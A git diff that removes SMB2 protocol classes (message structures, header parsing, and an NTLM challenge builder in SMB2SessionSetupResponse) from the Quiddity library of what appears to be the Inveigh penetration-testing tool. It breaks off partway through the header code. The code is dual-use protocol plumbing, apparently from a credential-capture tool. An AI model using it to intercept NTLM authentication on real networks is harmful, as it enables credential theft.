INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2ReadResponse - { - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs deleted file mode 100644 index 3259da2..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupRequest.cs +++ /dev/null @@ -1,89 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System.IO; - -namespace Quiddity.SMB2 -{ - class SMB2SessionSetupRequest - { - //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5a3c2c28-d6b0-48ed-b917-a86b2ca4575f - public ushort StructureSize { get; set; } - public byte Flags { get; set; } - public byte SecurityMode { get; set; } - public byte[] Capabilities { get; set; } - public byte[] Channel { get; set; } - public ushort SecurityBufferOffset { get; set; } - public ushort SecurityBufferLength { get; set; } - public byte[] PreviousSessionId { get; set; } - public byte[] Buffer { get; set; } - - public SMB2SessionSetupRequest() - { - this.StructureSize = 19; - this.Flags = 0x00; - this.SecurityMode = 0x01; - this.Capabilities = new byte[4] { 0x01, 0x00, 0x00, 0x00 }; - this.Channel = new byte[4]; - this.SecurityBufferOffset = 88; - this.SecurityBufferLength = 0; - this.PreviousSessionId = new byte[8]; - this.Buffer = new byte[0]; - } - - public SMB2SessionSetupRequest(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.StructureSize = packetReader.ReadUInt16(); - this.Flags = packetReader.ReadByte(); - this.SecurityMode = packetReader.ReadByte(); - this.Capabilities = packetReader.ReadBytes(4); - this.Channel = packetReader.ReadBytes(4); - this.SecurityBufferOffset = packetReader.ReadUInt16(); - this.SecurityBufferLength = packetReader.ReadUInt16(); - this.PreviousSessionId = packetReader.ReadBytes(8); - this.Buffer = packetReader.ReadBytes(this.SecurityBufferLength); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs deleted file mode 100644 index 7948a9c..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2SessionSetupResponse.cs +++ /dev/null @@ -1,114 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.IO; -using Quiddity.NTLM; - -namespace Quiddity.SMB2 -{ - class SMB2SessionSetupResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/0324190f-a31b-4666-9fa9-5c624273a694 - public ushort StructureSize { get; set; } - public ushort SessionFlags { get; set; } - public ushort SecurityBufferOffset { get; set; } - public ushort SecurityBufferLength { get; set; } - public byte[] Buffer { get; set; } - - public SMB2SessionSetupResponse() - { - this.StructureSize = 9; - this.SessionFlags = 0; - this.SecurityBufferOffset = 72; - this.SecurityBufferLength = 0; - this.Buffer = new byte[0]; - } - - public SMB2SessionSetupResponse(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.StructureSize = packetReader.ReadUInt16(); - this.SessionFlags = packetReader.ReadUInt16(); - this.SecurityBufferOffset = packetReader.ReadUInt16(); - this.SecurityBufferLength = packetReader.ReadUInt16(); - this.Buffer = packetReader.ReadBytes(this.SecurityBufferLength); - } - - } - - public byte[] GetBytes() - { - this.SecurityBufferLength = (ushort)Buffer.Length; - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.StructureSize); - packetWriter.Write(this.SessionFlags); - packetWriter.Write(this.SecurityBufferOffset); - packetWriter.Write(this.SecurityBufferLength); - - if (this.SecurityBufferLength > 0) - { - packetWriter.Write(this.Buffer); - } - - return memoryStream.ToArray(); - } - - } - - public void Pack(string challenge, string netBIOSName, string computerName, string dnsDomain, string dnsComputerName, string dnsTreeName, out byte[] challengeData) - { - NTLMChallenge ntlmChallenge = new NTLMChallenge(); - ntlmChallenge.ServerChallenge = ntlmChallenge.Challenge(challenge); - challengeData = ntlmChallenge.ServerChallenge; - byte[] timestamp = BitConverter.GetBytes(DateTime.Now.ToFileTime()); - NTLMAVPair ntlmAVPair = new NTLMAVPair(); - ntlmChallenge.Payload = ntlmAVPair.GetBytes(netBIOSName, computerName, dnsDomain, dnsComputerName, dnsTreeName, timestamp); - byte[] ntlmChallengeData = ntlmChallenge.GetBytes(computerName); - byte[] gssapiData = ntlmChallenge.Encode(ntlmChallengeData); - this.SecurityBufferLength = (ushort)gssapiData.Length; - this.Buffer = gssapiData; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs deleted file mode 100644 index 48ad1d4..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectRequest.cs +++ /dev/null @@ -1,50 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - - class SMB2TreeConnectRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/832d2130-22e8-4afb-aafd-b30bb0901798 - public ushort StructureSize { get; set; } - public byte[] Flags { get; set; } - public byte[] Reserved { get; set; } - public ushort PathOffset { get; set; } - public ushort PathLength { get; set; } - public byte[] Buffer { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs deleted file mode 100644 index 64214cc..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeConnectResponse.cs +++ /dev/null @@ -1,88 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - - enum ShareType : byte - { - SMB2_SHARE_TYPE_DISK = 0x01, - SMB2_SHARE_TYPE_PIPE = 0x02, - SMB2_SHARE_TYPE_PRINT = 0x03 - } - - enum ShareFlags : uint - { - SMB2_SHAREFLAG_MANUAL_CACHING = 0x00000000, - SMB2_SHAREFLAG_AUTO_CACHING = 0x00000010, - SMB2_SHAREFLAG_VDO_CACHING = 0x00000020, - SMB2_SHAREFLAG_NO_CACHING = 0x00000030, - SMB2_SHAREFLAG_DFS = 0x00000001, - SMB2_SHAREFLAG_DFS_ROOT = 0x00000002, - SMB2_SHAREFLAG_RESTRICT_EXCLUSIVE_OPENS = 0x00000100, - SMB2_SHAREFLAG_FORCE_SHARED_DELETE = 0x00000200, - SMB2_SHAREFLAG_ALLOW_NAMESPACE_CACHING = 0x00000400, - SMB2_SHAREFLAG_ACCESS_BASED_DIRECTORY_ENUM = 0x00000800, - SMB2_SHAREFLAG_FORCE_LEVELII_OPLOCK = 0x00001000, - SMB2_SHAREFLAG_ENABLE_HASH_V1 = 0x00002000, - SMB2_SHAREFLAG_ENABLE_HASH_V2 = 0x00004000, - SMB2_SHAREFLAG_ENCRYPT_DATA = 0x00008000, - SMB2_SHAREFLAG_IDENTITY_REMOTING = 0x00040000, - SMB2_SHAREFLAG_COMPRESS_DATA = 0x00100000 - } - - enum Capabilities : uint - { - SMB2_SHARE_CAP_DFS = 0x00000008, - SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY = 0x00000010, - SMB2_SHARE_CAP_SCALEOUT = 0x00000020, - SMB2_SHARE_CAP_CLUSTER = 0x00000040, - SMB2_SHARE_CAP_ASYMMETRIC = 0x00000080, - SMB2_SHARE_CAP_REDIRECT_TO_OWNER = 0x00000100 - } - - - class SMB2TreeConnectResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/dd34e26c-a75e-47fa-aab2-6efc27502e96 - public ushort StructureSize { get; set; } - public byte ShareType { get; set; } - public byte Reserved { get; set; } - public uint ShareFlags { get; set; } - public uint Capabilities { get; set; } - public uint MaximalAccess { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs deleted file mode 100644 index b14ff67..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectRequest.cs +++ /dev/null @@ -1,45 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2TreeDisconnectRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/8a622ecb-ffee-41b9-b4c4-83ff2d3aba1b - public ushort StructureSize { get; set; } - public byte[] Reserved { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs deleted file mode 100644 index 40e2925..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2TreeDisconnectResponse.cs +++ /dev/null @@ -1,45 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2TreeDisconnectResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/aeac92de-8db3-48f8-a8b7-bfee28b9fd9e - public ushort StructureSize { get; set; } - public byte[] Reserved { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs deleted file mode 100644 index daf53e5..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2WriteRequest.cs +++ /dev/null @@ -1,68 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - enum Channel : uint - { - SMB2_CHANNEL_NONE = 0x00000001, - SMB2_CHANNEL_RDMA_V1 = 0x0000002, - SMB2_CHANNEL_RDMA_V1_INVALIDATE = 0x00000003, - SMB2_CHANNEL_RDMA_TRANSFORM = 0x0000004 - } - - enum WriteRequestFlags : uint // Flags - { - SMB2_WRITEFLAG_WRITE_THROUGH = 0x00000001, - SMB2_WRITEFLAG_WRITE_UNBUFFERED = 0x0000002 - } - - class SMB2WriteRequest - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e7046961-3318-4350-be2a-a8d69bb59ce8 - public ushort StructureSize { get; set; } - public ushort DataOffset { get; set; } - public uint Length { get; set; } - public ulong Offset { get; set; } - public byte[] Field { get; set; } - public uint Channel { get; set; } - public uint RemainingBytes { get; set; } - public ushort WriteChannelInfoOffset { get; set; } - public ushort WriteChannelInfoLength { get; set; } - public uint Flags { get; set; } - public byte[] Buffer { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs deleted file mode 100644 index 4266118..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs +++ /dev/null @@ -1,49 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.SMB2 -{ - class SMB2WriteResponse - { - // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/7b80a339-f4d3-4575-8ce2-70a06f24f133 - public ushort StructureSize { get; set; } - public byte[] Reserved { get; set; } - public uint Count { get; set; } - public uint Remaining { get; set; } - public ushort WriteChannelInfoOffset { get; set; } - public ushort WriteChannelInfoLength { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Header.cs b/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Header.cs deleted file mode 100644 index 65f595e..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/SMB2/SMB2Header.cs +++ /dev/null @@ -1,133 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System.IO; - -namespace Quiddity.SMB2 -{ - class SMB2Header - { - /* - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/fb188936-5050-48d3-b350-dc43059638a4 - */ - public byte[] Protocol { get; set; } - public ushort StructureSize { get; set; } - public ushort CreditCharge { get; set; } - public byte[] Status { get; set; } // SMB2.x requests and all responses - public ushort ChannelSequence { get; set; } // SMB3.x requests - public ushort Reserved { get; set; } // SMB3.x requests - public ushort Command { get; set; } - public ushort Credit { get; set; } // CreditRequest/CreditResponse - public byte[] Flags { get; set; } - public byte[] NextCommand { get; set; } - public ulong MessageId { get; set; } - public uint Reserved2 { get; set; } // Process ID? - public uint TreeId { get; set; } - public byte[] SessionId { get; set; } - public byte[] Signature { get; set; } - - public SMB2Header() - { - this.Protocol = new byte[4] { 0xfe, 0x53, 0x4d, 0x42 }; - this.StructureSize = 64; - this.CreditCharge = 0; - this.Status = new byte[4]; - this.Command = 0; - this.Credit = 1; - this.Flags = new byte[4] { 0x01, 0x00, 0x00, 0x00 }; - this.NextCommand = new byte[4]; - this.MessageId = 0; - this.Reserved2 = 0; - this.TreeId = 0; - this.SessionId = new byte[8]; - this.Signature = new byte[16]; - } - - public SMB2Header(byte[] data) - { - ReadBytes(data, 0); - } - - public SMB2Header(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.Protocol = packetReader.ReadBytes(4); - this.StructureSize = packetReader.ReadUInt16(); - this.CreditCharge = packetReader.ReadUInt16(); - this.Status = packetReader.ReadBytes(4); - this.Command = packetReader.ReadUInt16(); - this.Credit = packetReader.ReadUInt16(); - this.Flags = packetReader.ReadBytes(4); - this.NextCommand = packetReader.ReadBytes(4); - this.MessageId = packetReader.ReadUInt64(); - this.Reserved2 = packetReader.ReadUInt32(); - this.TreeId = packetReader.ReadUInt32(); - this.SessionId = packetReader.ReadBytes(8); - this.Signature = packetReader.ReadBytes(16); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.Protocol); - packetWriter.Write(this.StructureSize); - packetWriter.Write(this.CreditCharge); - 